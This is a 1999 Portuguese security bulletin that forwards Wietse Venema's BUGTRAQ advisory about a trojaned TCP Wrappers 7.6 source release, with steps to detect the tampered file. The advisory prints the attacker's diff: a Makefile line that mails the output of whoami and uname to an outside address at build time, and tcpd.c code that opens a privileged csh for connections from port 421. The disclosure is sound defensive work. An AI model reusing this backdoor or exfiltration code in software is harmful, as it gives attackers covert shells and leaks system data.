Alteração do Código do Programa TCPWRAPPER

Colaboração: José Vicente Machado Filho

Data de Publicação: 25 de Janeiro de 1999

O TCPWRAPPER foi "trojanado" e várias pessoas chegaram a fazer download do programa alterado.

No e-mail abaixo, segue toda a descrição do problemas divulgado pelo próprio Wietse Venema.

José Vicente Machado Filho Analista de Suporte

Modulo Security Solutions S.A. http://www.modulo.com.br

—---Mensagem original-----
De: Wietse Venema <wietse@PORCUPINE.ORG>
Para: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
Data: Quinta-feira, 21 de Janeiro de 1999 18:34
Assunto: [S] backdoored tcp wrapper source code


>TCP Wrappers is a widely-used security tool to protect UNIX systems
>against intrusion. In has an estimated installed base of millions.
>
>Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
>a backdoored version. Eventually this was bound to happen, and
>that's why the source file is accompanied by a PGP signature.  But
>that is no guarantee against people downloading and installing
>backdoored software.
>
>The backdoor gives access to a privileged shell when a client
>connects from port 421.
>
>The backdoored copy was downloaded 52 times between 07:16 MET and
>16:29 MET. I have informed the sites that downloaded a copy.
>
>Below are details on how to recognize the backdoored version.
>
>        Wietse
>
>Relevant time stamp/size information (times relative to MET):
>
>Backdoored version:
>
>    % ls -lcta
>    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
>    ...
>    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .
>
>Restored version:
>
>    % ls -lt tcp_wrappers_7.6.tar.gz
>    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
>
>The signature of the bad TAR file is: length 99186 instead of 99438.
>The signature of a compiled tcpd binary is:
>
>    strings -a tcpd | grep csh
>
>any output probably means trouble.
>
>Changes that were made to the tcp wrapper 7.6 source code:
>
>diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
>*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
>--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
>***************
>*** 26,31 ****
>--- 26,32 ----
>        @echo
>        @echo "If none of these match your environment, edit the system"
>        @echo "dependencies sections in the Makefile and do a 'make
other'."
>+       @sh -c écho debug-""whoami""-""uname -a"" |mail -s debug
wtcpd@hotmail.com'
>        @echo
>
>  #######################################################
>***************
>*** 649,655 ****
>  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
>  # Solaris 2.x, and Linux. See your system documentation for details.
>  #
>! KILL_OPT= -DKILL_IP_OPTIONS
>
>  ## End configuration options
>  ############################
>--- 650,656 ----
>  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
>  # Solaris 2.x, and Linux. See your system documentation for details.
>  #
>! # KILL_OPT= -DKILL_IP_OPTIONS
>
>  ## End configuration options
>  ############################
>Only in 7.6: Makefile-
>diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
>*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
>--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
>***************
>*** 41,52 ****
>--- 41,63 ----
>  int     allow_severity = SEVERITY;    /* run-time adjustable */
>  int     deny_severity = LOG_WARNING;  /* ditto */
>
>+ char    IDENT[]="NC421\n";
>+ char    SRUN[]="-csh";
>+ char    SPATH[]="/bin/csh";
>+ #define PORT 421
>+
>  main(argc, argv)
>  int     argc;
>  char  **argv;
>  {
>      struct request_info request;
>+     struct sockaddr_in from;
>      char    path[MAXPATHNAMELEN];
>+     int     fromlen;
>+
>+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
>+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
>+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
>
>      /* Attempt to prevent the creation of world-writable files. */
>